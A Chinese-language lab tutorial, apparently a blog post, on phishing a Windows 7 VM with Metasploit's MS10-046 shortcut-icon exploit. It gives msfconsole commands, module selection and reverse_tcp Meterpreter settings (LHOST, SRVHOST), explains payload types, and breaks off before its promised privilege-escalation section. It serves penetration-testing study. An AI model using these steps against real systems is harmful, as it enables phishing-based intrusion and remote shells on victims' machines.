钓鱼网站+bypassuac提权

本实验实现1
：要生成一个钓鱼网址链接，诱导用户点击，实验过程是让win7去点击这个钓鱼网站链接，则会自动打开一个文件共享服务器的文件夹，在这个文件夹里面会有两个文件，当用户分别点击执行后，则会主动连接到发起攻击的主机上，即可攻击成功

本实验实现2 ：攻击成功后，想要从kali上传文件到win7中，后发现权限不够的问题，则进行提权操作，后成功上传文件

在VMware上建立两个虚拟机：win7和kali

Kali：它是Linux发行版的操作系统，它拥有超过300个渗透测试工具，就不用自己再去找安装包，去安装到我们自己的电脑上了，毕竟自己从网上找到，也不安全。它甚至还集成了600多种黑客工具，很强大。

可以永久免费使用，基本上学黑客攻击必会用到这个系统

靶机：Win7 64位 （IP: 192.168.10.36）–用ipconfig进行查询

攻击机：Kali 64位 （IP：192.168.10.21）–用ifconfig进行查询

1 、实验环境前提条件：

win7中，关闭防火墙（“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项）

保证两个虚拟机是可以ping通的（尤其是在kali中去ping win7，看能否连通）

>ping 192.168.10.36

2 、打开 Metasploit 渗透工具

Metasploit是一款开源的安全漏洞检测工具，msfconsole用于启动msf终端

>msfconsole

结果：成功进入，进入到"msf6>“的模式下

3 、查看需要利用的漏洞

搜索漏洞，编号为ms10-046

【 补充 ：Windows系统漏洞微软的漏洞编号命名格式为：MS10-046；

MS Micosoft的缩写，固定格式；
10 表示年份，即2010年发布的漏洞；
046 表示顺序，即当年度发布的第46个漏洞。

>search ms10-046

结果：可以看到返回了多条可利用的漏洞模块信息

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块，进行攻击，进入模块中（ 注意 ：必须是“_”，不是“-”，否则会报错）

>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

结果：成功切换到这个模块之下–”msf6
exploit(windows/browser/ms10_046_shortcut_icon_dllloader)>“

并提示“no payload configured,defaulting to
windows/meterpreter/reverse_tcp”–没有配置payload，默认为
windows/meterpreter/reverse_tcp

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后，先查看该测试模块的参数情况。类似于你使用一软件，进行攻击，是不是需要先进行一些简单的参数配置啊，需要告诉软件，要向谁发起攻击吧，这是最最基本的，所以，要配置，就要先查看都可以配置哪些参数？

>show options

结果：其中required显示的值为yes的，代表是必须要设置的项；显示的值为no的，代表是不必须要设置的项；

重点关注5个参数配置，需要设置哪个就设置哪个：

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ；

SRVHOST(文件共享服务器-kali地址)；

SRVPORT(文件共享服务器的端口-使用默认获取的端口即可)；

LHOST(发起攻击的地址-kali地址)；

LPORT(发起攻击的端口-使用默认获取的端口即可)

【 补充说明：

1）Payload中包含有需要在远程系统中运行的恶意代码，Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。也就是说，漏洞利用模块可以访问目标系统，而其中的代码定义了Payload在目标系统中的行为。

2）Payload模块主要有以下三种类型：-Single -Stager -Stage

Single是一种完全独立的Payload，实现的目的也简单，但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接，并下载额外的组件或应用程序。 一种常见的Stagers
Payload就是reverse_tcp，它可以让目标系统与攻击者建立一条tcp连接（3次握手-4次挥手）（是一个基于TCP的反向链接反弹shell,
使用起来很稳定）。

<